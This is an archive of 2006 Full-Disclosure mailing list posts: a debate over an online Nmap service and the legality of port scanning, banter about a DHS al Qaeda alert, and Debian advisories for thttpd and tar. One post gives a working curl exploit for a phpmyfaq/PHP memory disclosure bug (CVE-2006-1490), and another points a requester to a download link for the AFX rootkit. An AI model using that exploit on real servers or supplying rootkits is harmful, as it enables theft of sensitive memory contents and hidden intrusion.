We have set limits to prevent abuse of our service. Yes, one can still scan someone else's network; this is in violation of our Terms of Service. We log every attempt and we are ready to provide these logs to authorities. However, everyone who has Internet access is able to download Nmap and do a similar scan. You can do nothing more with our service. There is no damage you can cause with our service even if it is abused. We believe that the pros outweigh the cons here, that people will use our service to fix their issues on their firewalls and networks.
-- David Matousek Founder and Chief Representative of Matousec - Transparent security http://www.matousec.com/ David Taylor wrote: > How do you plan on dealing with all the abuse complaints you get hit with > when people use your server to perform unauthorized scans of their networks? > > > ================================================== > David Taylor //Sr. Information Security Specialist > University of Pennsylvania Information Security > Philadelphia PA USA > (215) 898-1236 > http://www.upenn.edu/computing/security/ > ================================================== > > > Shadowserver Foundation Member > http://www.shadowserver.org/ > > > > -----Original Message----- > From: full-disclosure-bounces at lists.grok.org.uk > [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of David > Matousek > Sent: Tuesday, November 28, 2006 3:19 AM > To: full-disclosure at lists.grok.org.uk > Subject: [Full-disclosure] Nmap Online > > > Hello, > > For all Nmap fans, our group have implemented Nmap Online service. > Its address is http://nmap-online.com/. The interface allows you to perform > custom > Nmap scans from our server with only a few limitations in the syntax. > The service is free and can be used immediately, no registration is > required. > > Please direct your questions and suggestions to our emails. > > > Regards, > From julio at rfdslabs.com.br Fri Dec 1 14:37:43 2006 From: julio at rfdslabs.com.br (Julio Cesar Fort) Date: Fri, 01 Dec 2006 11:37:43 -0300 Subject: [Full-disclosure] Financial firms warned of Qaeda cyber attack Message-ID: >From the Reuters article: "WASHINGTON (Reuters) - The U.S. government warned American private financial services on Thursday of an al Qaeda call for a cyber attack against online stock trading and banking Web sites beginning on Friday, a source said." Makes me remind US Bombs' "The World" song ;) Julio Cesar Fort Recife, PE, Brazil www.rfdslabs.com.br - computers, sex, human mind, music and more. 
From SDALAN04 at smumn.edu Fri Dec 1 14:47:09 2006
From: SDALAN04 at smumn.edu (SDALAN04 at smumn.edu)
Date: Fri, 01 Dec 2006 08:47:09 -0600
Subject: [Full-disclosure] Financial firms warned of Qaeda cyber attack
Message-ID: <200612011447096941632096@mail.smumn.edu>

Yet you continue to pump this bullshit out just like our American Government. WTF is wrong with you? Nobody but a few people believe this shit. Hopefully this rant will kill this gay-ass thread... Asshole ;)

On Friday, December 01, 2006 8:34 AM, Juha-Matti Laurio wrote:
>From the Reuters article:
>
>Date: Fri, 1 Dec 2006 16:34:06 +0200 (EET)
>From: Juha-Matti Laurio
>To: bugtraq at securityfocus.com, full-disclosure at lists.grok.org.uk
>Subject: [Full-disclosure] Financial firms warned of Qaeda cyber attack
>
>"WASHINGTON (Reuters) - The U.S. government warned American private financial services on Thursday of an al Qaeda call for a cyber attack against online stock trading and banking Web sites beginning on Friday, a source said."
>
>Reportedly DHS confirmed an alert had been distributed but said there was no reason to believe the threat was credible.
>
>More at
>http://today.reuters.com/News/newsArticle.aspx?type=internetNews&storyID=2006-12-01T061519Z_01_WBT006236_RTRUKOC_0_US-SECURITY-USA-QAEDA.xml&WTmodLoc=InternetNewsHome_C1_%5bFeed%5d-8
>
>
>SANS Internet Storm Center (ISC) has issued the following Diary entries,
>several references included:
>
>From ISC director Marcus H. Sachs:
>http://isc.sans.org/diary.php?storyid=1900
>
>and "US DHS banking alert" entry released earlier by Johannes Ullrich:
>http://isc.sans.org/diary.php?storyid=1899
>
>- Juha-Matti
>
>_______________________________________________
>Full-Disclosure - We believe in it.
>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>Hosted and sponsored by Secunia - http://secunia.com/

"Great Spirits Have Always Encountered Violent Opposition From Mediocre Minds" - Einstein
"So much stupidity in so little brain!"
From randallm at fidmail.com Fri Dec 1 14:53:45 2006
From: randallm at fidmail.com (Randall M)
Date: Fri, 1 Dec 2006 08:53:45 -0600
Subject: [Full-disclosure] Nmap Online
In-Reply-To:
Message-ID: <20061201145351.0F8DF1236@lists.grok.org.uk>

[
[------------------------------
[
[Message: 11
[Date: Fri, 1 Dec 2006 06:48:38 -0500
[From: "Dude VanWinkle"
[Subject: Re: [Full-disclosure] Nmap Online
[To: "Mike Huber"
[Cc: full-disclosure at lists.grok.org.uk
[Message-ID:
[
[Content-Type: text/plain; charset=ISO-8859-1; format=flowed
[
[On 12/1/06, Mike Huber wrote:
[> first of all, IANAL, but the TOS seem to cover the basics...
[
[> None-the-less, my 8-ball sees litigation in their future.
[
[
[portscanning isnt illegal in the states
[
[-JP
[
[

RandallM

From michael.holstein at csuohio.edu Fri Dec 1 15:04:39 2006
From: michael.holstein at csuohio.edu (Michael Holstein)
Date: Fri, 01 Dec 2006 10:04:39 -0500
Subject: [Full-disclosure] Financial firms warned of Qaeda cyber attack
In-Reply-To: <16640517.344181164983646039.JavaMail.juha-matti.laurio@netti.fi>
References: <16640517.344181164983646039.JavaMail.juha-matti.laurio@netti.fi>
Message-ID: <45704487.3060306@csuohio.edu>

> Reportedly DHS confirmed an alert had been distributed but said there was no reason to believe the threat was credible.

and since when is DHS "credible" itself? and why do people scatter every time their terrorism "mood ring" changes color?

I guess they don't realize that servers overheat when wrapped with plastic and duct tape.

~Mike.

From michael.holstein at csuohio.edu Fri Dec 1 15:08:17 2006
From: michael.holstein at csuohio.edu (Michael Holstein)
Date: Fri, 01 Dec 2006 10:08:17 -0500
Subject: [Full-disclosure] Nmap Online
In-Reply-To: <456FF8AA.9B1E.0073.0@alterhighschool.org>
References: <456BF10D.9080400@matousec.com> <829b2de40611301619r39d24560w16184c16280ab3b1@mail.gmail.com> <1bde4ec50612010448y4c0bc8fbi1b9ad62235c58757@mail.gmail.com> <456FF8AA.9B1E.0073.0@alterhighschool.org>
Message-ID: <45704561.5080800@csuohio.edu>

> ...I wonder if someone probably didn't like all the portscans they got
> from it (....thinks of Microsoft) and took it out?
> David.

Heck .. how to portscan Microsoft has been in the Nmap man page for ages (even in the help you get when you execute it without arguments) .. although it's not in the latest version (it was the -P0 option). It still has Microsoft as an example in usage though:

Ex: scanme.nmap.org, microsoft.com/24, 192.168.0.1; 10.0.0-255.1-254

~Mike.

From SDALAN04 at smumn.edu Fri Dec 1 15:15:52 2006
From: SDALAN04 at smumn.edu (SDALAN04 at smumn.edu)
Date: Fri, 01 Dec 2006 09:15:52 -0600
Subject: [Full-disclosure] Financial firms warned of Qaeda cyber attack
Message-ID: <200612011515526141632399@mail.smumn.edu>

I beg to differ Mike, they are trying to play the same lame ass game as the (Bush) Oil industry, trying to raise interest rates because Osama Bin Laden is going to hack everyone's account. Not so smart, I guess I better withdraw all my American money and buy Euros to be safe?

On Friday, December 01, 2006 9:04 AM, Michael Holstein wrote:
>> Reportedly DHS confirmed an alert had been distributed but said there was no reason to believe the threat was credible.
>
>Date: Fri, 01 Dec 2006 10:04:39 -0500
>From: Michael Holstein
>To:
>Subject: Re: [Full-disclosure] Financial firms warned of Qaeda cyber attack
>
>and since when is DHS "credible" itself? and why do people scatter every
>time their terrorism "mood ring" changes color?
>
>I guess they don't realize that servers overheat when wrapped with
>plastic and duct tape.
>
>~Mike.
>
>_______________________________________________
>Full-Disclosure - We believe in it.
>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>Hosted and sponsored by Secunia - http://secunia.com/

"Great Spirits Have Always Encountered Violent Opposition From Mediocre Minds" - Einstein
"So much stupidity in so little brain!"

From chedder1 at gmail.com Fri Dec 1 15:25:35 2006
From: chedder1 at gmail.com (chedder1 at gmail.com)
Date: Fri, 01 Dec 2006 07:25:35 -0800
Subject: [Full-disclosure] Financial firms warned of Qaeda cyber attack
In-Reply-To: <16640517.344181164983646039.JavaMail.juha-matti.laurio@netti.fi>
References: <16640517.344181164983646039.JavaMail.juha-matti.laurio@netti.fi>
Message-ID: <20061201152535.GA5758@cheesebox.vc.shawcable.net>

Teehee, yeah.. and they are gonna use pen-guns like in James Bond, expose Iraq's WMDs, and topple the entire western world too... since when do caves even have connections?

On Fri, Dec 01, 2006 at 04:34:06PM +0200, Juha-Matti Laurio wrote:
> From the Reuters article:
> "WASHINGTON (Reuters) - The U.S. government warned American private financial services on Thursday of an al Qaeda call for a cyber attack against online stock trading and banking Web sites beginning on Friday, a source said."
>
> Reportedly DHS confirmed an alert had been distributed but said there was no reason to believe the threat was credible.
>
> More at
> http://today.reuters.com/News/newsArticle.aspx?type=internetNews&storyID=2006-12-01T061519Z_01_WBT006236_RTRUKOC_0_US-SECURITY-USA-QAEDA.xml&WTmodLoc=InternetNewsHome_C1_%5bFeed%5d-8
>
>
> SANS Internet Storm Center (ISC) has issued the following Diary entries,
> several references included:
>
> From ISC director Marcus H.
Sachs:
> http://isc.sans.org/diary.php?storyid=1900
>
> and "US DHS banking alert" entry released earlier by Johannes Ullrich:
> http://isc.sans.org/diary.php?storyid=1899
>
> - Juha-Matti
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

--
http://chedder.hacked.in
"You don't exist. Go away"

From skx at debian.org Fri Dec 1 15:36:34 2006
From: skx at debian.org (Steve Kemp)
Date: Fri, 1 Dec 2006 15:36:34 +0000
Subject: [Full-disclosure] [SECURITY] [DSA 1205-2] New thttpd packages fix insecure temporary file creation
Message-ID: <20061201153634.GA20597@steve.org.uk>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 1205-2                  security at debian.org
http://www.debian.org/security/                                 Steve Kemp
December 1st, 2006                      http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package        : thttpd
Vulnerability  : insecure temporary files
Problem-Type   : local
Debian-specific: yes
CVE ID         : CVE-2006-4248
Debian Bug     : 396277

Marco d'Itri discovered that thttpd, a small, fast and secure webserver, makes use of insecure temporary files when its logfiles are rotated, which might lead to a denial of service through a symlink attack. The original advisory for this issue didn't contain fixed packages for all supported architectures; these are corrected in this update.
For the stable distribution (sarge) this problem has been fixed in version 2.23beta1-3sarge2.

For the unstable distribution (sid) this problem has been fixed in version 2.23beta1-5.

We recommend that you upgrade your thttpd package.

Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the footer to the proper configuration.

Debian GNU/Linux 3.1 alias sarge
- --------------------------------

These files will probably be moved into the stable distribution on its next update.
- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce at lists.debian.org
Package info: `apt-cache show ' and http://packages.debian.org/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.1 (GNU/Linux)

iD8DBQFFcEu4wM/Gs81MDZ0RAlC3AKCwfFp3xBERF++ZlJrbrE05r8Z+WgCfdQ0K
HeTSA+a1FJmlA36FbBRFj6Q=
=3NoA
-----END PGP SIGNATURE-----

From Valdis.Kletnieks at vt.edu Fri Dec 1 15:53:07 2006
From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu)
Date: Fri, 01 Dec 2006 10:53:07 -0500
Subject: [Full-disclosure] Financial firms warned of Qaeda cyber attack
In-Reply-To: Your message of "Fri, 01 Dec 2006 11:37:43 -0300."
References:
Message-ID: <200612011553.kB1Fr7KY015326@turing-police.cc.vt.edu>

On Fri, 01 Dec 2006 11:37:43 -0300, Julio Cesar Fort said:
> From the Reuters article:
> "WASHINGTON (Reuters) - The U.S. government warned American private
> financial services on Thursday of an al Qaeda call for a cyber attack
> against online stock trading and banking Web sites beginning on Friday,
> a source said."

We're lucky that al Qaeda didn't call for a bioterrorism attack, like flesh-eating bacteria in the entire US supply of Hanes jockey shorts. ;)

-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 226 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061201/72412c95/attachment.bin

From tonu at jes.ee Fri Dec 1 14:57:41 2006
From: tonu at jes.ee (Tonu Samuel)
Date: Fri, 1 Dec 2006 16:57:41 +0200
Subject: [Full-disclosure] phpmyfaq exploit using PHP bug, CVE-2006-1490
Message-ID: <200612011657.41992.tonu@jes.ee>

A long time ago I made unnecessary noise about a PHP zeroday. I expected it to be maybe much more dangerous than it appeared to be in the end. There was a lot of discussion and one of the main points of consensus was that this bug is not exploitable in the real world because no one is using those vulnerable functions. This bug was originally found using the phpmyfaq software and a wrong assumption was made about the wideness of the problem.

Anyway, now half a year later it is time to show the exploit:

curl "http://vulnerablehost/phpmyfaq/admin/index.php" -D - -d "faqusername=%00VERYLONGSTRINGHEREEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"

The longer the input you provide, the longer the memory dump you get. Works if PHP is unpatched AND phpmyfaq is older than 1.6.0. The memory dump you get is part of apache memory and often contains sensitive information from other served pages and contexts.

To make it clear - this is NOT the fault of the phpmyfaq people at all. Even more, they made a workaround within an hour after I contacted them and urged users to upgrade. phpmyfaq just appears to be one popular piece of software which is easily findable by Google, and this was the software where the initial discovery was made. PHP people knew about the problem but ignored it for long enough for it to be discovered independently of them.

Tõnu

From colin.75 at btinternet.com Fri Dec 1 16:15:55 2006
From: colin.75 at btinternet.com (Colin Copley)
Date: Fri, 1 Dec 2006 16:15:55 -0000
Subject: [Full-disclosure] how to hide files, services and process in windows 2k/xp/2k3 box
References: 003401c58548$1272f370$6f64a8c0@microsof28e7c5 <456F6FC5.5090802@markbaker.net>
Message-ID: <00a401c71563$fb1d5e60$0301a8c0@intuwares.com>

"Mark Baker" wrote:
> I am trying to find a rootkit to hide processes and dll's from World of
> Warcraft but can't find where to download AFX rootkit. Can you direct
> me where to download the rootkit and instructions? The home page seems to be down.

You can download AFX 2005 here: www.rootkit.com/vault/therealaphex/AFXRootkit2005.zip

They also have a nice selection of alternatives. But why would u want to cheat at Warcraft?
Must be Alliance. Cheers Colin From b.hines at comcast.net Fri Dec 1 16:33:56 2006 From: b.hines at comcast.net (b.hines at comcast.net) Date: Fri, 01 Dec 2006 16:33:56 +0000 Subject: [Full-disclosure] Financial firms warned of Qaeda cyber attack Message-ID: <120120061633.17526.45705974000B3B870000447622007340769C0A020708D20D@comcast.net> Valdis, or worse a Japanese game show I think? http://www.glumbert.com/media/tonguetwister.html -------------- Original message -------------- From: Valdis.Kletnieks at vt.edu > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061201/3e8cccf3/attachment.html From dudevanwinkle at gmail.com Fri Dec 1 16:45:53 2006 From: dudevanwinkle at gmail.com (Dude VanWinkle) Date: Fri, 1 Dec 2006 11:45:53 -0500 Subject: [Full-disclosure] Nmap Online In-Reply-To: <86zma7shm8.fsf@blue.stonehenge.com> References: <456BF10D.9080400@matousec.com> <829b2de40611301619r39d24560w16184c16280ab3b1@mail.gmail.com> <86zma7shm8.fsf@blue.stonehenge.com> Message-ID: On 01 Dec 2006 08:31:11 -0800, Randal L. Schwartz wrote: > >>>>> "Dude" == Dude VanWinkle writes: > > Dude> On 12/1/06, Mike Huber wrote: > >> first of all, IANAL, but the TOS seem to cover the basics... > Dude> > >> None-the-less, my 8-ball sees litigation in their future. > > > Dude> portscanning isnt illegal in the states > > If it can be argued as an "unauthorized access", it's at least a misdemeanor > in many states, felony in some. And you don't want to be on the wrong end of > that prosecution. > > -- > Randal L. Schwartz - Stonehenge Consulting Services, Inc. - +1 503 777 0095 Its obvious that anyone who hires Stonehenge Consulting services is getting someone who cant read. 
I never said postscanning was illegal. i said it "isnt illegal". I even provided a link to the case in georgia that helped decide this. -JP From dudevanwinkle at gmail.com Fri Dec 1 16:49:14 2006 From: dudevanwinkle at gmail.com (Dude VanWinkle) Date: Fri, 1 Dec 2006 11:49:14 -0500 Subject: [Full-disclosure] Nmap Online In-Reply-To: <86vekvshj7.fsf@blue.stonehenge.com> References: <456BF10D.9080400@matousec.com> <829b2de40611301619r39d24560w16184c16280ab3b1@mail.gmail.com> <829b2de40612010456n1049c644ie06d1ff292abba7d@mail.gmail.com> <86vekvshj7.fsf@blue.stonehenge.com> Message-ID: On 01 Dec 2006 08:33:00 -0800, Randal L. Schwartz wrote: > >>>>> "Dude" == Dude VanWinkle writes: > > Dude> Here is an example of what is legal vs what isnt: If you scan a > Dude> machine with nmap from one machine, that is not illegal. If you run > Dude> 100,00 nmap scans from a distributed botnet and take down their > Dude> server, thats illegal. > > It's clear you're not a lawyer, and anyone who takes your advice here would be > a fool. But I just wanted to point that out again for the clueless. so if you are disagreeing with one of the above statements, then one of the following must be true in your opinion: you _can_ legally DoS someones server with 100,000 nmap scans or It is illegal to portscan learn to read buddy. -JP From merlyn at stonehenge.com Fri Dec 1 16:31:11 2006 From: merlyn at stonehenge.com (Randal L. Schwartz) Date: 01 Dec 2006 08:31:11 -0800 Subject: [Full-disclosure] Nmap Online In-Reply-To: References: <456BF10D.9080400@matousec.com> <829b2de40611301619r39d24560w16184c16280ab3b1@mail.gmail.com> Message-ID: <86zma7shm8.fsf@blue.stonehenge.com> >>>>> "Dude" == Dude VanWinkle writes: Dude> On 12/1/06, Mike Huber wrote: >> first of all, IANAL, but the TOS seem to cover the basics... Dude> >> None-the-less, my 8-ball sees litigation in their future. 
Dude> portscanning isnt illegal in the states If it can be argued as an "unauthorized access", it's at least a misdemeanor in many states, felony in some. And you don't want to be on the wrong end of that prosecution. -- Randal L. Schwartz - Stonehenge Consulting Services, Inc. - +1 503 777 0095 Perl/Unix/security consulting, Technical writing, Comedy, etc. etc. See PerlTraining.Stonehenge.com for onsite and open-enrollment Perl training! From merlyn at stonehenge.com Fri Dec 1 16:33:00 2006 From: merlyn at stonehenge.com (Randal L. Schwartz) Date: 01 Dec 2006 08:33:00 -0800 Subject: [Full-disclosure] Nmap Online In-Reply-To: References: <456BF10D.9080400@matousec.com> <829b2de40611301619r39d24560w16184c16280ab3b1@mail.gmail.com> <829b2de40612010456n1049c644ie06d1ff292abba7d@mail.gmail.com> Message-ID: <86vekvshj7.fsf@blue.stonehenge.com> >>>>> "Dude" == Dude VanWinkle writes: Dude> Here is an example of what is legal vs what isnt: If you scan a Dude> machine with nmap from one machine, that is not illegal. If you run Dude> 100,00 nmap scans from a distributed botnet and take down their Dude> server, thats illegal. It's clear you're not a lawyer, and anyone who takes your advice here would be a fool. But I just wanted to point that out again for the clueless. -- Randal L. Schwartz - Stonehenge Consulting Services, Inc. - +1 503 777 0095 Perl/Unix/security consulting, Technical writing, Comedy, etc. etc. See PerlTraining.Stonehenge.com for onsite and open-enrollment Perl training! From merlyn at stonehenge.com Fri Dec 1 16:54:23 2006 From: merlyn at stonehenge.com (Randal L. 
Schwartz) Date: 01 Dec 2006 08:54:23 -0800 Subject: [Full-disclosure] Nmap Online In-Reply-To: References: <456BF10D.9080400@matousec.com> <829b2de40611301619r39d24560w16184c16280ab3b1@mail.gmail.com> <86zma7shm8.fsf@blue.stonehenge.com> Message-ID: <86irgvsgjk.fsf@blue.stonehenge.com> >>>>> "Dude" == Dude VanWinkle writes: Dude> Its obvious that anyone who hires Stonehenge Consulting services is Dude> getting someone who cant read. I never said postscanning was illegal. Dude> i said it "isnt illegal". And I'm disagreeing with this. Dude> I even provided a link to the case in Dude> georgia that helped decide this. If there's caselaw in Georgia, that's useful for Georgia, but certainly isn't referencable in the 49 other states. So you can't generalize that. -- Randal L. Schwartz - Stonehenge Consulting Services, Inc. - +1 503 777 0095 Perl/Unix/security consulting, Technical writing, Comedy, etc. etc. See PerlTraining.Stonehenge.com for onsite and open-enrollment Perl training! From chedder1 at gmail.com Fri Dec 1 16:59:30 2006 From: chedder1 at gmail.com (chedder1 at gmail.com) Date: Fri, 01 Dec 2006 08:59:30 -0800 Subject: [Full-disclosure] Financial firms warned of Qaeda cyber attack In-Reply-To: <120120061633.17526.45705974000B3B870000447622007340769C0A020708D20D@comcast.net> References: <120120061633.17526.45705974000B3B870000447622007340769C0A020708D20D@comcast.net> Message-ID: <20061201165930.GA6122@cheesebox.vc.shawcable.net> HOLY SHIT!!! What if they are responsible for japanese gameshows!? On Fri, Dec 01, 2006 at 04:33:56PM +0000, b.hines at comcast.net wrote: > Valdis, > or worse a Japanese game show I think? > > http://www.glumbert.com/media/tonguetwister.html > -------------- Original message -------------- > From: Valdis.Kletnieks at vt.edu > > > _______________________________________________ > > Full-Disclosure - We believe in it. 
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

--
http://chedder.hacked.in
"You don't exist. Go away"

From noahm at debian.org Fri Dec 1 16:26:11 2006
From: noahm at debian.org (Noah Meyerhans)
Date: Fri, 01 Dec 2006 17:26:11 +0100
Subject: [Full-disclosure] [SECURITY] [DSA 1223-1] New tar packages fix arbitrary file overwrite
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1223-1                security at debian.org
http://www.debian.org/security/                             Noah Meyerhans
December 01, 2006
- ------------------------------------------------------------------------

Package        : tar
Vulnerability  : input validation error
Problem type   : local
Debian-specific: no
CVE Id(s)      : CVE-2006-6097
BugTraq ID     : 21235
Debian Bug     : 399845

Teemu Salmela discovered a vulnerability in GNU tar that could allow a malicious user to overwrite arbitrary files by inducing the victim to attempt to extract a specially crafted tar file containing a GNUTYPE_NAMES record with a symbolic link.

For the stable distribution (sarge), this problem has been fixed in version 1.14-2.3.

For the unstable distribution (sid) and the forthcoming stable release (etch), this problem will be fixed in version 1.16-2.

We recommend that you upgrade your tar package.
Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the footer to the proper configuration.

Debian 3.1 (stable)
- -------------------

Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, m68k, mips, mipsel, powerpc, s390 and sparc.

These files will probably be moved into the stable distribution on its next update.
- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce at lists.debian.org
Package info: `apt-cache show ' and http://packages.debian.org/

From endrazine at gmail.com Fri Dec 1 17:22:53 2006
From: endrazine at gmail.com (endrazine)
Date: Fri, 01 Dec 2006 18:22:53 +0100
Subject: [Full-disclosure] Nmap Online
In-Reply-To: <457035E5.8090405@matousec.com>
References: <01af01c7154f$b518a780$654b5b82@shakuhachi> <457035E5.8090405@matousec.com>
Message-ID: <457064ED.7000300@gmail.com>

Hi David & list,

David Matousek wrote:
> We have set limits to prevent abuse of our service.
>
Come on, you're calling to get pwned here...

> Yes, one can still scan someone other's network, this is in violation with our Terms of Service.
>
Ouh, now that's scary.

> We log every attempt and we are ready to provide these logs to authorities.
>
Ever heard of tor ??

> However, everyone who has Internet access is able to download Nmap
> and do similar scan. You can do nothing more with our service.
> There is no damage you can cause with our service even if it is abused.
> We believe that pros are more than cons here, that people will use our service
> to fix their issues on their firewalls and networks

What about online metasploit & Core Impact too ?

;D

Cheers,

endrazine-

From dudevanwinkle at gmail.com Fri Dec 1 17:24:56 2006
From: dudevanwinkle at gmail.com (Dude VanWinkle)
Date: Fri, 1 Dec 2006 12:24:56 -0500
Subject: [Full-disclosure] Nmap Online
In-Reply-To: <86irgvsgjk.fsf@blue.stonehenge.com>
References: <456BF10D.9080400@matousec.com> <829b2de40611301619r39d24560w16184c16280ab3b1@mail.gmail.com> <86zma7shm8.fsf@blue.stonehenge.com> <86irgvsgjk.fsf@blue.stonehenge.com>
Message-ID:

On 01 Dec 2006 08:54:23 -0800, Randal L. Schwartz wrote:
> >>>>> "Dude" == Dude VanWinkle writes:
>
> Dude> It's obvious that anyone who hires Stonehenge Consulting services is
> Dude> getting someone who can't read. I never said portscanning was illegal.
> Dude> I said it "isn't illegal".
>
> And I'm disagreeing with this.

Why?

> Dude> I even provided a link to the case in
> Dude> georgia that helped decide this.
>
> If there's caselaw in Georgia, that's useful for Georgia, but
> certainly isn't referencable in the 49 other states. So you can't
> generalize that.

So, you are disagreeing with Kevin who states:
http://www.securityfocus.com/news/126
"The ruling does not affect criminal applications of the anti-hacking law, but federal law enforcement officials are generally in agreement that port scanning is not a crime."

Do you know of a case where someone was convicted due to a portscan? I can imagine that a portscan may be used in conjunction with other evidence to build a case for intent, but I have not heard of anyone being busted for an nmap scan.

I was going to build the case, but it looks like someone has already done it for me:

from: http://www.krcf.org/krcfhome/MINDS_NEWYORK/1MoC3e_d.htm

Only one published opinion has considered the legality of port scans. That court held that such activity did not violate federal or state computer protection statutes or other law.
The federal district court for the Northern District of Georgia held that a party who conducted port scans of another party's computer systems did not violate the Computer Fraud and Abuse Act (18 U.S.C. s. 1030) [1], because he neither caused damage nor gained access to the computers at issue. Moulton v. VC3, 2000 WL 3331091 at *6 (N.D. Ga., Nov. 7, 2000). Nor did the port scans violate state law, because they did not interfere with computer or network activity.

References:
[1] The Computer Fraud and Abuse Act:
[2] Moulton v. VC3, 2000 WL 3331091 (N.D. Ga., Nov. 7, 2000)
[3] Computer Crime and Intellectual Property Section, U.S. Department of Justice, Legislative Analysis of the 1996 National Information Infrastructure Protection Act:
[4] Computer Crime and Intellectual Property Section, U.S. Department of Justice, Field Guidance on New Authorities That Relate to Computer Crime and Electronic Evidence Enacted in the USA Patriot Act of 2001

---------------------------

So back to my earlier statement: if you nessus someone's machine, that would impact their performance and be illegal; a single nmap scan, not so much.

Now I am not saying that some hot-shot lawyer wouldn't be able to convince a judge to imprison someone for an nmap scan, but while you may be able to convince a judge that OJ didn't do it, murder is still illegal.

-JP

From dudevanwinkle at gmail.com Fri Dec 1 17:34:09 2006
From: dudevanwinkle at gmail.com (Dude VanWinkle)
Date: Fri, 1 Dec 2006 12:34:09 -0500
Subject: [Full-disclosure] Nmap Online
In-Reply-To: <86irgvsgjk.fsf@blue.stonehenge.com>
References: <456BF10D.9080400@matousec.com> <829b2de40611301619r39d24560w16184c16280ab3b1@mail.gmail.com> <86zma7shm8.fsf@blue.stonehenge.com> <86irgvsgjk.fsf@blue.stonehenge.com>
Message-ID:

On 01 Dec 2006 08:54:23 -0800, Randal L. Schwartz wrote:
>
> If there's caselaw in Georgia, that's useful for Georgia, but
> certainly isn't referencable in the 49 other states.

Actually, it is. It is called legal precedence.

From merlyn at stonehenge.com Fri Dec 1 17:36:58 2006
From: merlyn at stonehenge.com (Randal L. Schwartz)
Date: 01 Dec 2006 09:36:58 -0800
Subject: [Full-disclosure] Nmap Online
In-Reply-To:
References: <456BF10D.9080400@matousec.com> <829b2de40611301619r39d24560w16184c16280ab3b1@mail.gmail.com> <86zma7shm8.fsf@blue.stonehenge.com> <86irgvsgjk.fsf@blue.stonehenge.com>
Message-ID: <86bqmnsekl.fsf@blue.stonehenge.com>

>>>>> "Dude" == Dude VanWinkle writes:

Dude> On 01 Dec 2006 08:54:23 -0800, Randal L. Schwartz wrote:
>>
>> If there's caselaw in Georgia, that's useful for Georgia, but
>> certainly isn't referencable in the 49 other states.

Dude> actually, it is. it is called legal precedence

It wasn't clear from your posting that you were talking about a federal case.
In that case, yes, it's caselaw. However, if it was just Georgia state law,
that would *not* create case law for any other state.

By the way, "caselaw" and "legal precedent" are the same.

-- 
Randal L. Schwartz - Stonehenge Consulting Services, Inc. - +1 503 777 0095
Perl/Unix/security consulting, Technical writing, Comedy, etc. etc.
See PerlTraining.Stonehenge.com for onsite and open-enrollment Perl training!

From dudevanwinkle at gmail.com Fri Dec 1 16:52:21 2006
From: dudevanwinkle at gmail.com (Dude VanWinkle)
Date: Fri, 1 Dec 2006 11:52:21 -0500
Subject: [Full-disclosure] Nmap Online
In-Reply-To: <457041f8.22c98603.2bc1.5db2SMTPIN_ADDED@mx.google.com>
References: <457041f8.22c98603.2bc1.5db2SMTPIN_ADDED@mx.google.com>
Message-ID:

On 12/1/06, Randall M wrote:
>
> [
> [------------------------------
> [
> [Message: 11
> [Date: Fri, 1 Dec 2006 06:48:38 -0500
> [From: "Dude VanWinkle"
> [Subject: Re: [Full-disclosure] Nmap Online
> [To: "Mike Huber"
> [Cc: full-disclosure at lists.grok.org.uk
> [Message-ID:
> [
> [Content-Type: text/plain; charset=ISO-8859-1; format=flowed
> [
> [On 12/1/06, Mike Huber wrote:
> [> first of all, IANAL, but the TOS seem to cover the basics...
> [
> [> None-the-less, my 8-ball sees litigation in their future.
> [
> [
> [portscanning isn't illegal in the states
> [
> [-JP [a lawyer>
> [
> [
>
> RandallM
>

-JP

From dudevanwinkle at gmail.com Fri Dec 1 17:45:39 2006
From: dudevanwinkle at gmail.com (Dude VanWinkle)
Date: Fri, 1 Dec 2006 12:45:39 -0500
Subject: [Full-disclosure] Nmap Online
In-Reply-To: <86bqmnsekl.fsf@blue.stonehenge.com>
References: <456BF10D.9080400@matousec.com> <829b2de40611301619r39d24560w16184c16280ab3b1@mail.gmail.com> <86zma7shm8.fsf@blue.stonehenge.com> <86irgvsgjk.fsf@blue.stonehenge.com> <86bqmnsekl.fsf@blue.stonehenge.com>
Message-ID:

On 01 Dec 2006 09:36:58 -0800, Randal L. Schwartz wrote:
> >>>>> "Dude" == Dude VanWinkle writes:
>
